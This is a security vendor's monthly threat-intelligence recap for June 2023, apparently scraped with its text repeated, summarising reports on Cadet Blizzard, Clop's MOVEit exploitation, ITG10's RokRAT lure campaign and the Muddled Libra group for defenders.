[Upcoming Session] 2024 Mid-Year Attacks & Trends. Join us August 1st.
Register
Skip to main content
On-Demand Webinar

Forge Charged News: The Most Electrifying News From June 2023

Forge News
On-Demand Webinar

Forge Charged News: The Most Electrifying News From June 2023

Detection Strategies

Forge Charged News

The Most Electrifying News From June 2023

The Anvilogic Forge team provides a recap of monthly trending threats. The community intelligence we collect is molded into actionable defense strategies to help defend your organization from the biggest emerging threats. 

What’s Surging? Our Picks of The Most Thunderous News From June 2023
(1) Cadet Blizzard Recognized as the Culprit of Russian Data Wiper Malware

Category: Threat Actor Activity | Source: Microsoft

Microsoft has designated a Russian threat group previously tracked as DEV-0586 to 'Cadet Blizzard,' who is responsible for a series of destructive and disruptive cyber operations against Ukraine. "Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," said Microsoft. Their most prominent activity is tied to the development and deployment of the WhisperGate data wiper from January 2022. However, the roots of their activities date back to as early as 2020. The threat group is also responsible for several defacement attacks against Ukrainian websites and conducting hack-and-leak operations, which are communicated on the 'Free Civilian' Telegram channel. Cadet Blizzard has targeted multiple industry verticals, including entities in consulting, emergency services, government, law enforcement, and technology. The threat group maintains a consistent focus on regions such as Ukraine, Europe, Central Asia, and Latin America. However, their operational targets may shift depending on the objectives set by the Russian military. 

"Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets’ off-business hours. Microsoft assesses NATO member states involved in providing military aid to Ukraine are at greater risk." Operators from Cadet Blizzard have favored the use of compromised credentials to gain access to exposed servers, web shells, tunneling tools, and “living off the land” techniques to maintain a low profile on target networks. In January and June 2022, seemingly at the height of the Russia and Ukraine conflict, Cadet Blizzard’s activity peaked and noticeably decreased in the following months. It wasn't until January 2023; Microsoft observed the group resurfacing with the defacement attacks. Whilst Cadet Blizzard is involved with destructive cyber operations, Microsoft notes the group's success rate isn't to the level of Russia's other GRU-affiliated threat groups such as APT28 (Strontium, Fancy Bear), APT29 (Cozy Bear), Gamaredon Group (Shuckworm) and Sandworm (Iridium).

(2) CVE-2023-34362: Signs of Clop & MOVEit Dates Back to 2021

Category: Vulnerability | Sources: BleepingComputer, Huntress, Kroll

Analysis of the MOVEit vulnerability, CVE-2023-34362, appears to have been primed since 2021 for exploitation. Researchers from Kroll correlated activity across compromised client environments, noticing patterns the Clop operators had meticulously planned for the mass exploitation of the vulnerability in an automated fashion. "Kroll’s review of Microsoft Internet Information Services (IIS) logs of impacted clients found evidence of similar activity occurring in multiple client environments last year (April 2022) and in some cases as early as July 2021." A key indication of the organized attack was network traffic in which GET requests were made for the target's org_id. "This collection of the Org ID would allow for victim categorization and data inventorying by Clop on a per-exfiltration operation," said Kroll. 

From a historical review of logs, several IP addresses 92.51.2.10, 92.118.36.112, and 92.118.36.233 had initiated GET requests for the value of an organization ID. Kroll explains the "observed activity consistent with MOVEit Transfer exploitation that collectively occurred on April 27, 2022, May 15–16, 2023, and May 22, 2023, indicating actors were testing access to organizations via likely automated means and pulling back information from the MOVEit Transfer servers to identify which organization they were accessing." A significant increase in the scale of requests was observed by Kroll on May 15th, 2023, leading up to the commencement of exploitation attacks on May 15th, 2023. This pattern aligned with previous instances of manually executed commands targeting MOVEit Transfer servers in July 2021, suggesting the ransomware gang waited until they possessed the necessary tools to execute the final attack in late May 2023. 

BleepingComputer confirmed with a Clop representative that the ransomware gang has been actively abusing the MOVEit vulnerability, CVE-2023-34362, targeting organizations for data theft and extortion. The Clop representative confirmed they've been exploiting MOVEit since May 27th, 2023, taking advantage of the long US holiday weekend. In Clop's email communication to BleepingComputer, the ransomware gang claims to have deleted data belonging to government agencies, the military, and children’s hospitals. The Clop ransomware gang has been notifying victims through extortion notices and posting entries for compromised organizations on their data leak site since June 14th, 2023. Claiming to have breached "hundreds of companies," the ransomware gang may begin posting and showing proof of their exploits in the coming days.

(3) Intrusions from Asylum Ambuscade Runs with Mixed Objectives

Category: Threat Actor Activity | Source: IBM

The North Korean APT group ITG10 has been identified to be conducting a large-scale cyber campaign targeting various South Korean entities. According to a report from IBM's Security X-Force, the campaign targets organizations in sectors such as communication, education, energy, government, manufacturing, supply chain, think tanks, and dissident groups. ITG10 shares similarities in tactics, techniques, and procedures with APT37 (aka. ScarCruft, Richochet Chollima), leading to the assessment of overlap between these threat groups. As part of their attack strategy, ITG10 is utilizing malicious lure documents to distribute malware, including a remote access trojan named RokRAT. Lure documents distributed from ITG10 have touched on subjects associated with geopolitical news or the coverage of such news, media production for broadcasts, document proposals, and an agenda for a multi-group seminar.

The decoy documents were delivered within a zip file or ISO container file also containing a shortcut/LNK file to initiate the execution of a PowerShell script opening the decoy document to distract the victim while the download of the RokRAT occurs in the background. X-Force encountered another batch of potentially related malware, pertaining to three distinct LNK files being used to drop a VBS file as opposed to a usual batch script payload. Unfortunately, the final payload could not be retrieved, leaving the malware capabilities unknown and their association to ITG10 or further establishing a link with APT37. "IBM X-Force assesses with high confidence that individuals and organizations holding strategic, political, or military information in connection with the Korean peninsula will see elevated threats from the DPRK, given ITG10’s previous and recent activity."

Grounding the Storm with Detections from the Forge

Muddled Libra Showcases Proficiency with Multiple Toolkits

Category: Threat Actor Activity | Source: Unit 42

A high proficiency threat group tracked as "Muddled Libra" has been identified and tracked by researchers at Palo Alto Unit42. This group exhibits exceptional technical expertise, demonstrated by utilizing diverse toolkits, including the prominent 0ktapus phishing kit, penetration testing tools, various open-source tools, and memory forensic tools, such as MAGNET RAM Capture and Volatility, for acquiring credentials. It is important to note that Unit42 distinguishes Muddled Libra as a separate threat group solely utilizing the 0ktapus phishing kit rather than attributing it to previously reported threat groups like 0ktapus, Scattered Spider, and Scatter Swine. Muddled Libra's proficiency extends beyond their extensive toolkit utilization. Muddled Libra also demonstrated resilience by adapting and persisting in network intrusions. In the realm of social engineering, Muddled Libra not only conducts thorough open-source target research but also employs tactics such as contacting help desk individuals to coerce access for their operations. 

"The Muddled Libra threat group has also repeatedly demonstrated a strong understanding of the modern incident response (IR) framework. This knowledge allows them to continue progressing toward their goals even as incident responders attempt to expel them from an environment. Once established, this threat group is difficult to eradicate," said Unit42. Muddled Libra had even been shown to obtain access and erase their activity from the admin consoles of endpoint detection and response (EDR) tools. From a review of Muddled Libra's intrusions, Unit42 observed that the threat group clearly focuses on data and credential theft, usually avoiding remote execution. 

"Muddled Libra has shown a penchant for targeting a victim's downstream customers using stolen data and, if allowed, they will return repeatedly to the well to refresh their stolen dataset. Using this stolen data, the threat actor has the ability to return to prior victims even after initial incident response." This threat group is also dangerous for their desire to compromise software supply chains to cause widespread impact to gain access to high-value targets. Particular industries Muddled Libra has demonstrated interest in include cryptocurrency organizations, entities associated with outsourcing, technology, and telecommunications.

RDP/Remote Access Leads to System Defense Mod & Credential Theft

Want more? 

The Anvilogic Armory contains over 2,000 detections created by the Forge content development and research teams to help you defend your network. These trending topics can be found in our Armory with content already mapped to help you quickly deploy detection and secure your environment.
- Sign-up to receive the Forge weekly threat report or see other reports
- Read more about the Forge’s approach to detections can help create an effective threat detection strategy

Get the Latest Resources

Leave Your Data Where You Want: Detect Across Snowflake

Demo Series
Leave Your Data Where You Want: Detect Across Snowflake
Watch

MonteAI: Your Detection Engineering & Threat Hunting Co-Pilot

Demo Series
MonteAI: Your Detection Engineering & Threat Hunting Co-Pilot
Watch
Break Free from SIEM Lock-in
Get the latest news, blog posts and threat reports
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
By submitting this form, you agree to our Terms of Use
and acknowledge our Privacy Statement.
Product
PlatformIntegrations
Learn
BlogResourcesThreat ResearchDetection DispatchWebinarsCustomersSolution GuidesWhite PapersData Sheets
Customer Resources
Log InRelease NotesKnowledge Base
Company
About UsCareersContact Us
Facebook
Twitter
Linkedin
© 2024 Anvilogic. All Rights Reserved.
[Upcoming Session] 2024 Mid-Year Attacks & Trends. Join us August 1st.
Register
Skip to main content
White Paper

Forge Charged News: The Most Electrifying News From June 2023

Forge News
Break Free from SIEM Lock-in
Get the latest news, blog posts and threat reports
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
By submitting this form, you agree to our Terms of Use
and acknowledge our Privacy Statement.
Product
PlatformIntegrations
Learn
BlogResourcesThreat ResearchDetection DispatchWebinarsCustomersSolution GuidesWhite PapersData Sheets
Customer Resources
Log InRelease NotesKnowledge Base
Company
About UsCareersContact Us
Facebook
Twitter
Linkedin
© 2024 Anvilogic. All Rights Reserved.
[Upcoming Session] 2024 Mid-Year Attacks & Trends. Join us August 1st.
Register
Skip to main content
July 25, 2023

Forge Charged News: The Most Electrifying News From June 2023

Forge News

Forge Charged News

The Most Electrifying News From June 2023

The Anvilogic Forge team provides a recap of monthly trending threats. The community intelligence we collect is molded into actionable defense strategies to help defend your organization from the biggest emerging threats. 

What’s Surging? Our Picks of The Most Thunderous News From June 2023
(1) Cadet Blizzard Recognized as the Culprit of Russian Data Wiper Malware

Category: Threat Actor Activity | Source: Microsoft

Microsoft has designated a Russian threat group previously tracked as DEV-0586 to 'Cadet Blizzard,' who is responsible for a series of destructive and disruptive cyber operations against Ukraine. "Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," said Microsoft. Their most prominent activity is tied to the development and deployment of the WhisperGate data wiper from January 2022. However, the roots of their activities date back to as early as 2020. The threat group is also responsible for several defacement attacks against Ukrainian websites and conducting hack-and-leak operations, which are communicated on the 'Free Civilian' Telegram channel. Cadet Blizzard has targeted multiple industry verticals, including entities in consulting, emergency services, government, law enforcement, and technology. The threat group maintains a consistent focus on regions such as Ukraine, Europe, Central Asia, and Latin America. However, their operational targets may shift depending on the objectives set by the Russian military. 

"Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets’ off-business hours. Microsoft assesses NATO member states involved in providing military aid to Ukraine are at greater risk." Operators from Cadet Blizzard have favored the use of compromised credentials to gain access to exposed servers, web shells, tunneling tools, and “living off the land” techniques to maintain a low profile on target networks. In January and June 2022, seemingly at the height of the Russia and Ukraine conflict, Cadet Blizzard’s activity peaked and noticeably decreased in the following months. It wasn't until January 2023; Microsoft observed the group resurfacing with the defacement attacks. Whilst Cadet Blizzard is involved with destructive cyber operations, Microsoft notes the group's success rate isn't to the level of Russia's other GRU-affiliated threat groups such as APT28 (Strontium, Fancy Bear), APT29 (Cozy Bear), Gamaredon Group (Shuckworm) and Sandworm (Iridium).

(2) CVE-2023-34362: Signs of Clop & MOVEit Dates Back to 2021

Category: Vulnerability | Sources: BleepingComputer, Huntress, Kroll

Analysis of the MOVEit vulnerability, CVE-2023-34362, appears to have been primed since 2021 for exploitation. Researchers from Kroll correlated activity across compromised client environments, noticing patterns the Clop operators had meticulously planned for the mass exploitation of the vulnerability in an automated fashion. "Kroll’s review of Microsoft Internet Information Services (IIS) logs of impacted clients found evidence of similar activity occurring in multiple client environments last year (April 2022) and in some cases as early as July 2021." A key indication of the organized attack was network traffic in which GET requests were made for the target's org_id. "This collection of the Org ID would allow for victim categorization and data inventorying by Clop on a per-exfiltration operation," said Kroll. 

From a historical review of logs, several IP addresses 92.51.2.10, 92.118.36.112, and 92.118.36.233 had initiated GET requests for the value of an organization ID. Kroll explains the "observed activity consistent with MOVEit Transfer exploitation that collectively occurred on April 27, 2022, May 15–16, 2023, and May 22, 2023, indicating actors were testing access to organizations via likely automated means and pulling back information from the MOVEit Transfer servers to identify which organization they were accessing." A significant increase in the scale of requests was observed by Kroll on May 15th, 2023, leading up to the commencement of exploitation attacks on May 15th, 2023. This pattern aligned with previous instances of manually executed commands targeting MOVEit Transfer servers in July 2021, suggesting the ransomware gang waited until they possessed the necessary tools to execute the final attack in late May 2023. 

BleepingComputer confirmed with a Clop representative that the ransomware gang has been actively abusing the MOVEit vulnerability, CVE-2023-34362, targeting organizations for data theft and extortion. The Clop representative confirmed they've been exploiting MOVEit since May 27th, 2023, taking advantage of the long US holiday weekend. In Clop's email communication to BleepingComputer, the ransomware gang claims to have deleted data belonging to government agencies, the military, and children’s hospitals. The Clop ransomware gang has been notifying victims through extortion notices and posting entries for compromised organizations on their data leak site since June 14th, 2023. Claiming to have breached "hundreds of companies," the ransomware gang may begin posting and showing proof of their exploits in the coming days.

(3) Intrusions from Asylum Ambuscade Runs with Mixed Objectives

Category: Threat Actor Activity | Source: IBM

The North Korean APT group ITG10 has been identified to be conducting a large-scale cyber campaign targeting various South Korean entities. According to a report from IBM's Security X-Force, the campaign targets organizations in sectors such as communication, education, energy, government, manufacturing, supply chain, think tanks, and dissident groups. ITG10 shares similarities in tactics, techniques, and procedures with APT37 (aka. ScarCruft, Richochet Chollima), leading to the assessment of overlap between these threat groups. As part of their attack strategy, ITG10 is utilizing malicious lure documents to distribute malware, including a remote access trojan named RokRAT. Lure documents distributed from ITG10 have touched on subjects associated with geopolitical news or the coverage of such news, media production for broadcasts, document proposals, and an agenda for a multi-group seminar.

The decoy documents were delivered within a zip file or ISO container file also containing a shortcut/LNK file to initiate the execution of a PowerShell script opening the decoy document to distract the victim while the download of the RokRAT occurs in the background. X-Force encountered another batch of potentially related malware, pertaining to three distinct LNK files being used to drop a VBS file as opposed to a usual batch script payload. Unfortunately, the final payload could not be retrieved, leaving the malware capabilities unknown and their association to ITG10 or further establishing a link with APT37. "IBM X-Force assesses with high confidence that individuals and organizations holding strategic, political, or military information in connection with the Korean peninsula will see elevated threats from the DPRK, given ITG10’s previous and recent activity."

Grounding the Storm with Detections from the Forge

Muddled Libra Showcases Proficiency with Multiple Toolkits

Category: Threat Actor Activity | Source: Unit 42

A high proficiency threat group tracked as "Muddled Libra" has been identified and tracked by researchers at Palo Alto Unit42. This group exhibits exceptional technical expertise, demonstrated by utilizing diverse toolkits, including the prominent 0ktapus phishing kit, penetration testing tools, various open-source tools, and memory forensic tools, such as MAGNET RAM Capture and Volatility, for acquiring credentials. It is important to note that Unit42 distinguishes Muddled Libra as a separate threat group solely utilizing the 0ktapus phishing kit rather than attributing it to previously reported threat groups like 0ktapus, Scattered Spider, and Scatter Swine. Muddled Libra's proficiency extends beyond their extensive toolkit utilization. Muddled Libra also demonstrated resilience by adapting and persisting in network intrusions. In the realm of social engineering, Muddled Libra not only conducts thorough open-source target research but also employs tactics such as contacting help desk individuals to coerce access for their operations. 

"The Muddled Libra threat group has also repeatedly demonstrated a strong understanding of the modern incident response (IR) framework. This knowledge allows them to continue progressing toward their goals even as incident responders attempt to expel them from an environment. Once established, this threat group is difficult to eradicate," said Unit42. Muddled Libra had even been shown to obtain access and erase their activity from the admin consoles of endpoint detection and response (EDR) tools. From a review of Muddled Libra's intrusions, Unit42 observed that the threat group clearly focuses on data and credential theft, usually avoiding remote execution. 

"Muddled Libra has shown a penchant for targeting a victim's downstream customers using stolen data and, if allowed, they will return repeatedly to the well to refresh their stolen dataset. Using this stolen data, the threat actor has the ability to return to prior victims even after initial incident response." This threat group is also dangerous for their desire to compromise software supply chains to cause widespread impact to gain access to high-value targets. Particular industries Muddled Libra has demonstrated interest in include cryptocurrency organizations, entities associated with outsourcing, technology, and telecommunications.

RDP/Remote Access Leads to System Defense Mod & Credential Theft

Want more? 

The Anvilogic Armory contains over 2,000 detections created by the Forge content development and research teams to help you defend your network. These trending topics can be found in our Armory with content already mapped to help you quickly deploy detection and secure your environment.
- Sign-up to receive the Forge weekly threat report or see other reports
- Read more about the Forge’s approach to detections can help create an effective threat detection strategy

Break Free from SIEM Lock-in

Break Free from SIEM Lock-in

Book a Demo